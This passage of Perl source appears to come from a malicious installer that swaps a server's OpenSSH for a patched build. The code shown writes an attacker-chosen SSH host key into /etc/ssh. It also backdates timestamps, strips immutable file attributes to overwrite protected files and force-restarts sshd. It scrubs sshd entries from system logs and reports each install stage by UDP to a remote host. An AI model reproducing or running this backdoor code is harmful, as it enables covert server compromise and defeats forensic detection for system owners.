2455 `echo 'ssh-dss AAAAB3NzaC1kc3MAAACBAMy/7VFtJRXxhlbzoKBN/4EANeUh4z6asHBqJJDKKlP+C0AgT6dWQk+Y5Cm3+CucGMqB+QoxsIdJMQSSHIj/biJO7xq3IHmGIWRYRW4UiXIZ+Up7HKYGUOSrltZSYu2xKBKXFB6g/45ctaUH5DOeWQJWF88SBERQIefJ4WvMHeofAAAAFQC6PIoX68bXyhmDU55vRWFv9v8FRQAAAIAWTMG6CDh5tH1tDYIzJaSqNdFfgMeWbtaSnozYqchbCekrcy/0gBVfJxmuQ6mrudxzd0m403uBM0zC8CQaANnQgTsNKGsJuvc0nD++KtQ94yVoI1Q79vLlG6OhX7kdkahAqi3hIFl6bSmyDAhWmPEbJeVkSZkLLoWlyQKhqhIi6QAAAIEAvfArMS2sS22VvynOcBxfU6lAZfTJfWmYIbCsX4FB07/3WLVF6ZXYwqvYSBfgyUgO4Ic29qlBGMYXpLn9Id7MZLYqM9jjkNOS6lQYDd1nH90UWUl7mTBrrgaSDVsSu9gYulqrrPUCPa2Oz/3+HEzg8GaMIudBVoV+c5cytxbI8Hk= root\@$hostname' > /etc/ssh/ssh_host_dsa_key.pub`;
2456
2457 `chmod 600 /etc/ssh/ssh_host_dsa_key`;
2458 `chmod 644 /etc/ssh/ssh_host_dsa_key.pub`;
2459
2460 `touch -r /etc/ssh/ssh_host_rsa_key /etc/ssh/ssh_host_dsa_key`;
2461 `touch -r /etc/ssh/ssh_host_rsa_key /etc/ssh/ssh_host_dsa_key.pub`;
2462
2463 `touch -r /var/tmp/sess_8848cf7a0c9c209c99acc51f1e259788 /etc/ssh`;
2464 unlink('/var/tmp/sess_8848cf7a0c9c209c99acc51f1e259788');
2465}
2466
2467
2468
2469sub check_permissions_ssh_keys {
2470 if ( -f '/etc/ssh/ssh_host_rsa_key' ) {
2471 `chmod 600 /etc/ssh/ssh_host_rsa_key`;
2472 }
2473
2474 if ( -f '/etc/ssh/ssh_host_ecdsa_key' ) {
2475 `chmod 600 /etc/ssh/ssh_host_ecdsa_key`;
2476 }
2477
2478 if ( -f '/etc/ssh/ssh_host_ed25519_key' ) {
2479 `chmod 600 /etc/ssh/ssh_host_ed25519_key`;
2480 }
2481
2482 if ( -f '/etc/ssh/ssh_host_dsa_key' ) {
2483 `chmod 600 /etc/ssh/ssh_host_dsa_key`;
2484 }
2485
2486 if ( -f '/etc/ssh/ssh_host_key' ) {
2487 `chmod 600 /etc/ssh/ssh_host_key`;
2488 }
2489}
2490
2491
2492
2493sub generate_sid {
2494 my @chars = ('0'..'9', 'a'..'z');
2495
2496
2497 my $sid = '';
2498
2499
2500 for (my $i = 0; $i < 16; $i++) {
2501 $sid .= $chars[int(rand($#chars))];
2502 }
2503
2504
2505 return $sid;
2506}
2507
2508
2509
2510sub restart_sshd {
2511 print "[+] Restart SSHD$/";
2512
2513 my $sshd_pid = `head -1 /var/run/sshd.pid`;
2514 chomp($sshd_pid);
2515
2516 printf("Found SSHD Pid: %d$/", $sshd_pid);
2517
2518
2519 if ( ( $platform eq 'Debian' ) || ( $platform eq 'Ubuntu' ) ) {
2520 unless ( -f '/etc/init.d/ssh' ) {
2521 print "[!] Not found /etc/init.d/ssh$/";
2522 }
2523
2524 `ls -al /etc/init.d/ssh`;
2525
2526 print `/etc/init.d/ssh restart`;
2527 }
2528 elsif ( $platform eq 'FreeBSD' ) {
2529 print `/etc/rc.d/sshd restart`;
2530 }
2531 elsif ( -f '/etc/init.d/sshd' ) {
2532 `ls -al /etc/init.d/sshd`;
2533
2534 print `/etc/init.d/sshd restart`;
2535 }
2536 else {
2537 unless ( -f '/etc/init.d/sshd' ) {
2538 print "[!] Not found /etc/init.d/sshd$/";
2539
2540 `service sshd restart`;
2541 }
2542 }
2543
2544
2545 # Need for wait while sshd.pid created
2546 sleep(4);
2547
2548
2549 my $sshd_pid_new = `head -1 /var/run/sshd.pid`;
2550 chomp($sshd_pid_new);
2551
2552 printf("Found New SSHD Pid: %d$/", $sshd_pid_new);
2553
2554 if ( $sshd_pid == $sshd_pid_new ) {
2555 printf("[-] SSHD Pid and New SSHD Pid are equal: %d$/. Try kill -9 and restart SSHD$/", $sshd_pid);
2556
2557 `kill -9 $sshd_pid`;
2558 `/usr/sbin/sshd`;
2559 }
2560}
2561
2562
2563
2564sub remove_install_files {
2565 print "[+] Remove distributive files$/";
2566 chdir($run_path);
2567 `rm -rf openssh-6.6p1*`;
2568}
2569
2570
2571
2572### Copy new file and check secure bits
2573sub copy_file {
2574 my ($from, $to, $mode) = @_;
2575
2576
2577 my $directory = '';
2578
2579
2580 if ( $to =~ /^(.*)\/([^\/]+)/ ) {
2581 $directory = $1;
2582 }
2583
2584
2585 my $bits_directory = '';
2586 my $bits = '';
2587
2588
2589 if ( $platform ne 'FreeBSD' ) {
2590 $bits_directory = &check_bits_directory($directory);
2591 $bits = &check_bits($to);
2592 }
2593
2594 &chattr($bits_directory, $directory, '-');
2595 &chattr($bits, $to, '-');
2596
2597
2598 if ( $mode eq 'copy' ) {
2599 print "[+] Copy from $from to $to$/";
2600 `cp -f $from $to`;
2601 }
2602 else {
2603 print "[+] Move from $from to $to$/";
2604 `mv -f $from $to`;
2605 }
2606
2607
2608 &chattr($bits, $to, '+');
2609 &chattr($bits_directory, $directory, '+');
2610
2611
2612 if ( ( $mode eq 'move' ) && ( -e $from ) ) {
2613 print "[-] Can't copy file $from$/";
2614
2615 &remove_install_files();
2616
2617 exit(0);
2618 }
2619}
2620###
2621
2622
2623
2624sub lsattr {
2625 my $file = $_[0];
2626
2627
2628 my $bits = '';
2629
2630
2631 if ( -e '/usr/bin/lsattr' ) {
2632 my $args = ( -d $file ) ? '-d' : '';
2633 my $bits_ret = `lsattr $args $file`;
2634 chomp($bits_ret);
2635
2636 ($bits) = $bits_ret =~ /(.*)\s+$file$/;
2637
2638
2639 unless ( defined($bits) ) {
2640 $bits = '';
2641 }
2642 }
2643 else {
2644 my $mask = &lsattr_perl($file);
2645 $bits = scalar(&calcSymMask($mask));
2646 }
2647
2648
2649 return $bits;
2650}
2651
2652
2653sub chattr {
2654 my ($bits, $file, $mode) = @_;
2655
2656
2657 # Skip change bits if bits empty
2658 if ( $bits eq '' ) {
2659 return;
2660 }
2661
2662
2663 if ( -e '/usr/bin/chattr' ) {
2664 `chmod 755 /usr/bin/chattr`;
2665 print "RUN: chattr '$mode$bits' $file$/";
2666 `chattr $mode$bits $file`;
2667 }
2668 else {
2669 print "RUN: chattr_perl '$mode$bits' $file$/";
2670 &chattr_perl("$mode$bits", $file);
2671 }
2672}
2673
2674
2675
2676### Check secure bits
2677sub check_bits {
2678 my $file = $_[0];
2679
2680
2681 unless ( -e $file ) {
2682 return '';
2683 }
2684
2685
2686
2687 print "[+] Check secure bits: $file ";
2688
2689
2690 my $bits = &lsattr($file);
2691
2692 print " $bits ";
2693
2694
2695 my @bits_array = split(/-/,$bits);
2696
2697 if ( $#bits_array == -1 ) {
2698 print "[OK];$/";
2699
2700 return '';
2701 }
2702 else {
2703 my $chattr = '';
2704 print "[BAD];$/";
2705
2706 foreach (@bits_array) {
2707 if ( ($_ ne '') && ($_ ne 'e') ) {
2708 $chattr .= $_;
2709 }
2710 }
2711
2712
2713 if ($chattr ne '') {
2714 print "[+] Try chattr $chattr $file$/";
2715 }
2716
2717
2718 return $chattr;
2719 }
2720}
2721###
2722
2723
2724### Check secure bits
2725sub check_bits_directory {
2726 my $directory = $_[0];
2727
2728
2729 print "[+] Check secure bits directory: $directory ";
2730
2731
2732 my $bits = &lsattr($directory);
2733
2734 print " $bits ";
2735
2736
2737 my @bits_array = split(/-/, $bits);
2738
2739 if ( $#bits_array == -1 ) {
2740 print "[OK];$/";
2741
2742 return '';
2743 }
2744 else {
2745 my $chattr = '';
2746 print "[BAD];$/";
2747
2748 foreach (@bits_array) {
2749 if ( ($_ ne '') && ($_ ne 'e') && ($_ ne 'I') ) {
2750 $chattr .= $_;
2751 }
2752 }
2753
2754 if ($chattr ne '') {
2755 print "[+] Try chattr $chattr $directory$/";
2756 }
2757
2758
2759 return $chattr;
2760 }
2761}
2762###
2763
2764
2765
2766############################ lsattr and chattr perl ############################
2767my %attr = (
2768 s => 0x00000001, u => 0x00000002, c => 0x00000004, S => 0x00000008,
2769 i => 0x00000010, a => 0x00000020, d => 0x00000040, A => 0x00000080,
2770 Z => 0x00000100, X => 0x00000400, E => 0x00000800,
2771 I => 0x00001000, j => 0x00004000, t => 0x00008000,
2772 D => 0x00010000, T => 0x00020000,
2773);
2774
2775
2776use constant EXT2_IOC_GETFLAGS => 0x80046601;
2777use constant EXT2_IOC_SETFLAGS => 0x40046602;
2778
2779sub _get_ext2_attributes {
2780 my $file = shift;
2781 open my $fh, $file
2782 or return;
2783 my $res = pack 'i', 0;
2784 return unless defined ioctl($fh, EXT2_IOC_GETFLAGS, $res);
2785 $res = unpack 'i', $res;
2786}
2787
2788sub _set_ext2_attributes {
2789 my $file = shift;
2790 my $flags = shift;
2791 open my $fh, $file
2792 or return;
2793 my $flag = pack 'i', $flags;
2794 return unless defined ioctl($fh, EXT2_IOC_SETFLAGS, $flag);
2795}
2796
2797sub calcSymMask($) {
2798 my @F = _calcSymMask($_[0]);
2799 return @F if wantarray;
2800
2801 $_ = join('', @F);
2802 y/+//d;
2803 s/(?<=-)[sucSiadAZXEIjtDT]//g;
2804 return $_;
2805}
2806
2807sub _calcSymMask($) {
2808 my @mask;
2809 foreach ( sort { $attr{$a} <=> $attr{$b} } keys %attr ){
2810 push @mask, ($_[0] & $attr{$_} ? "+$_" : "-$_");
2811 }
2812 return @mask;
2813}
2814
2815
2816sub calc_mask {
2817 my $mask = $_[0];
2818
2819
2820 $mask =~ s/-//g;
2821
2822 my $calc = 0;
2823
2824 my @bits = split(//, $mask);
2825
2826 foreach (@bits) {
2827 $calc += $attr{$_};
2828 }
2829
2830 return $calc;
2831}
2832
2833
2834sub lsattr_perl {
2835 my $file = $_[0];
2836
2837 my $bits = &_get_ext2_attributes($file);
2838
2839 my $bits_str = scalar(&calcSymMask($bits));
2840
2841 return $bits_str;
2842}
2843
2844
2845sub chattr_perl {
2846 my ($bits_str, $file) = @_;
2847
2848 $bits_str =~ s/\+//g;
2849
2850 my $bits = &calc_mask($bits_str);
2851
2852 &_set_ext2_attributes($file, $bits);
2853}
2854############################ lsattr and chattr perl ############################
2855
2856
2857
2858
2859### Clean SSH logs
2860sub clean_logs {
2861 print "[+] Search logs$/";
2862
2863 chdir('/var/log');
2864
2865
2866 my $files = `ls -t | head -10`;
2867 my @files = split("$/", $files);
2868
2869 foreach (@files) {
2870 print "$_$/";
2871
2872 if ( -T $_ ) {
2873 my $tail = `tail -100 $_ | grep 'Server listening on' | tail -1`;
2874 if ( $tail =~ /(.*?\d{2}:\d{2}:)\d{2}.*Server listening on/ ) {
2875 print "$1$/";
2876 `cp /var/log/$_ /var/tmp/$_`;
2877 `cat /var/tmp/$_ | grep -v "$1" > /var/log/$_`;
2878 `rm -rf /var/tmp/$_`;
2879 last;
2880 }
2881
2882 $tail = `tail -100 $_ | grep 'Received signal 15' | tail -1`;
2883 if ( $tail =~ /(.*?\d{2}:\d{2}:)\d{2}.*Received signal 15/ ) {
2884 print "$1$/";
2885 `cp /var/log/$_ /var/tmp/$_`;
2886 `cat /var/tmp/$_ | grep -v "$1" > /var/log/$_`;
2887 `rm -rf /var/tmp/$_`;
2888 last;
2889 }
2890 }
2891 }
2892}
2893###
2894
2895
2896
2897sub install_from_same_host {
2898 print "[I] Get Version: $platform, OS: $os, Version OS: $version_os, Machine: $machine$/";
2899
2900 &install_compiled_ssh();
2901
2902 exit(0);
2903}
2904
2905
2906
2907sub notify_installed_ssh {
2908 my ($message) = @_;
2909
2910
2911 &send_udp('i', $message);
2912}
2913
2914
2915
2916sub notify_get_ssh_patch {
2917 my ($message) = @_;
2918
2919
2920 &send_udp('ip', $message);
2921}
2922
2923
2924
2925sub notify_get_openssh_src {
2926 my ($message) = @_;
2927
2928
2929 &send_udp('io', $message);
2930}
2931
2932
2933
2934sub notify_get_compiled_ssh {
2935 my ($message) = @_;
2936
2937
2938 &send_udp('ic', $message);
2939}
2940
2941
2942
2943sub notify_get_same_host_ssh {
2944 my ($message) = @_;
2945
2946
2947 &send_udp('is', $message);
2948}
2949
2950
2951
2952### Get server path when allow running scripts
2953sub get_path {
2954 my @paths = qw(/var/tmp /home /root /);
2955
2956 foreach my $path (@paths) {
2957 if ( &test_path($path) == 1 ) {
2958 print "[+] Good Path: $path$/";
2959
2960 return $path;
2961 }
2962 }
2963
2964 print "[-] Path not found$/";
2965
2966
2967 return '';
2968}
2969###
2970
2971
2972
2973sub test_path {
2974 my $path = $_[0];
2975
2976
2977 my $exec_file = 'towiejrs.sh';
2978 my $touch_file = 'qiwurjsd';
2979
2980
2981
2982 unless ( -d $path ) {
2983 return 0;
2984 }
2985
2986
2987 chdir($path);
2988
2989 open FILE, "> $exec_file";
2990 printf FILE ('#!/bin/sh%s', $/);
2991 print FILE "touch $touch_file$/";
2992 close FILE;
2993
2994 chmod 755, $exec_file;
2995
2996
2997 `./$exec_file`;
2998
2999 if ( -e $touch_file ) {
3000 unlink($touch_file);
3001 unlink($exec_file);
3002
3003 return 1;
3004 }
3005
3006 unlink($exec_file);
3007
3008
3009 return 0;
3010}